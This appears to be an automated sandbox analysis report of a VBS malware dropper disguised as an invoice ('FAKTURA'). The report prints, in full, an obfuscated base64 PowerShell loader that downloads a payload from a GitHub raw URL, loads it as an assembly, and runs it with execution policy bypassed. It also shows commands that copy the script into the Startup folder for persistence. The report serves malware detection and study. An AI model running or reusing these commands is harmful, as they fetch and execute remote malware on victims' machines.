Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2923Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2374Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1239Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 421Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4182Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5514Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180Thread sleep count: 2923 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180Thread sleep count: 2374 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4580Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3240Thread sleep count: 1239 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3240Thread sleep count: 421 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1644Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312Thread sleep count: 4182 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312Thread sleep count: 5514 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5736Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\PING.EXEWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\PING.EXELast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000008.00000002.1732143246.000001B9E00FF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.edadicom.vbs')')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\faktura-pdf-466366332.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.edadicom.vbs')')
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgneycrjzankyd9jysndxinkydsjysnid0gezj9ahr0chm6jysnly9yyxcuz2l0accrj3vijysndscrj3nlcmmnkydvbicrj3qnkydlbnquy29tl05vrgv0zwn0jysnt24nkycvticrj28nkydejysnzxrly3rpbi9yzwzzjysnl2gnkydlywrzl21hascrj24vrgv0jysnywgnkydobycrj3rolvyudhh0jysneycrjzj9oycrjyb7mh0nkydiyscrj3nlnjqnkyddb250zscrj250jysniccrjz0gke5ldy0nkydpyicrj2plyycrj3qgu3knkydzdgvtlk5ljysndc5xjysnzscrj2jdbgknkydlbnqplkqnkydvd25sb2fku3ryjysnascrj24nkydnkhswfscrj3vybck7jysniccrj3snkycwjysnfwjpbicrj2fyeunvjysnbnrljysnbicrj3qgjysnpsankydbu3lzjysndgvtjysnlicrj0mnkydvbnzlcicrj3rdjysnoicrjzonkydgcicrj29tqmfzjysnzty0u3qnkydyjysnaw5njysnkhswfwinkydhcycrj2u2nemnkydvjysnbicrj3rlbicrj3qpoyb7mh1hcycrj3nlbwjsesa9iccrj1snkydszwzsjysnzwn0aw9ulkfzjysncycrj2vtymx5jysnxto6tccrj29hzch7jysnmccrj30nkydiaw5hcnldbycrj250jysnzw4nkyd0ktsgw2rubglijysnlkknkydplkhvbwvdjysnojpwqscrj0kojysnezenkyd9jysnmc9dvmzqrccrjy8nkydkl2vllmv0c2enkydwjysnlycrjy86jysnc3b0jysndccrj2gnkyd7mx0sihsnkycxjysnfwrljysnc2f0ascrj3ynkydhzg97mx0nkycsiccrj3snkycxfwrlc2f0axynkydhzg97jysnmx0nkycsjysniccrj3sxfscrj2rlc2enkyd0axynkydhzg97mx0sihsxjysnfu1tqnvpjysnbccrj2r7mx0siccrj3sxjysnfxsxfswnkyd7mx17mx0nkycpjykglwygiftjagfsxtm2lftjagfsxtm0lftjagfsxtm5kxwmkcaow1nucmluz10kdkvsyk9zzxbszwzlumvuy0upwzesm10rj3gnlupvsw4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/nodetect'+'on'+'/n'+'o'+'d'+'etecton/refs'+'/h'+'eads/mai'+'n/det'+'ah'+'no'+'th-v.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'conte'+'nt'+' '+'= (new-'+'ob'+'jec'+'t sy'+'stem.ne'+'t.w'+'e'+'bcli'+'ent).d'+'ownloadstr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryco'+'nte'+'n'+'t '+'= '+'[sys'+'tem'+'.'+'c'+'onver'+'t]'+':'+':'+'fr'+'ombas'+'e64st'+'r'+'ing'+'({0}b'+'as'+'e64c'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'refl'+'ection.as'+'s'+'embly'+']::l'+'oad({'+'0'+'}'+'binaryco'+'nt'+'en'+'t); [dnlib'+'.i'+'o.home]'+'::va'+'i('+'{1'+'}'+'0/cvfjd'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}msbui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [char]36,[char]34,[char]39)|&( ([string]$verbosepreference)[1,3]+'x'-join'')"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\faktura-pdf-466366332.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.edadicom.vbs')')Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgneycrjzankyd9jysndxinkydsjysnid0gezj9ahr0chm6jysnly9yyxcuz2l0accrj3vijysndscrj3nlcmmnkydvbicrj3qnkydlbnquy29tl05vrgv0zwn0jysnt24nkycvticrj28nkydejysnzxrly3rpbi9yzwzzjysnl2gnkydlywrzl21hascrj24vrgv0jysnywgnkydobycrj3rolvyudhh0jysneycrjzj9oycrjyb7mh0nkydiyscrj3nlnjqnkyddb250zscrj250jysniccrjz0gke5ldy0nkydpyicrj2plyycrj3qgu3knkydzdgvtlk5ljysndc5xjysnzscrj2jdbgknkydlbnqplkqnkydvd25sb2fku3ryjysnascrj24nkydnkhswfscrj3vybck7jysniccrj3snkycwjysnfwjpbicrj2fyeunvjysnbnrljysnbicrj3qgjysnpsankydbu3lzjysndgvtjysnlicrj0mnkydvbnzlcicrj3rdjysnoicrjzonkydgcicrj29tqmfzjysnzty0u3qnkydyjysnaw5njysnkhswfwinkydhcycrj2u2nemnkydvjysnbicrj3rlbicrj3qpoyb7mh1hcycrj3nlbwjsesa9iccrj1snkydszwzsjysnzwn0aw9ulkfzjysncycrj2vtymx5jysnxto6tccrj29hzch7jysnmccrj30nkydiaw5hcnldbycrj250jysnzw4nkyd0ktsgw2rubglijysnlkknkydplkhvbwvdjysnojpwqscrj0kojysnezenkyd9jysnmc9dvmzqrccrjy8nkydkl2vllmv0c2enkydwjysnlycrjy86jysnc3b0jysndccrj2gnkyd7mx0sihsnkycxjysnfwrljysnc2f0ascrj3ynkydhzg97mx0nkycsiccrj3snkycxfwrlc2f0axynkydhzg97jysnmx0nkycsjysniccrj3sxfscrj2rlc2enkyd0axynkydhzg97mx0sihsxjysnfu1tqnvpjysnbccrj2r7mx0siccrj3sxjysnfxsxfswnkyd7mx17mx0nkycpjykglwygiftjagfsxtm2lftjagfsxtm0lftjagfsxtm5kxwmkcaow1nucmluz10kdkvsyk9zzxbszwzlumvuy0upwzesm10rj3gnlupvsw4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/nodetect'+'on'+'/n'+'o'+'d'+'etecton/refs'+'/h'+'eads/mai'+'n/det'+'ah'+'no'+'th-v.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'conte'+'nt'+' '+'= (new-'+'ob'+'jec'+'t sy'+'stem.ne'+'t.w'+'e'+'bcli'+'ent).d'+'ownloadstr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryco'+'nte'+'n'+'t '+'= '+'[sys'+'tem'+'.'+'c'+'onver'+'t]'+':'+':'+'fr'+'ombas'+'e64st'+'r'+'ing'+'({0}b'+'as'+'e64c'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'refl'+'ection.as'+'s'+'embly'+']::l'+'oad({'+'0'+'}'+'binaryco'+'nt'+'en'+'t); [dnlib'+'.i'+'o.home]'+'::va'+'i('+'{1'+'}'+'0/cvfjd'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}msbui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [char]36,[char]34,[char]39)|&( ([string]$verbosepreference)[1,3]+'x'-join'')"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
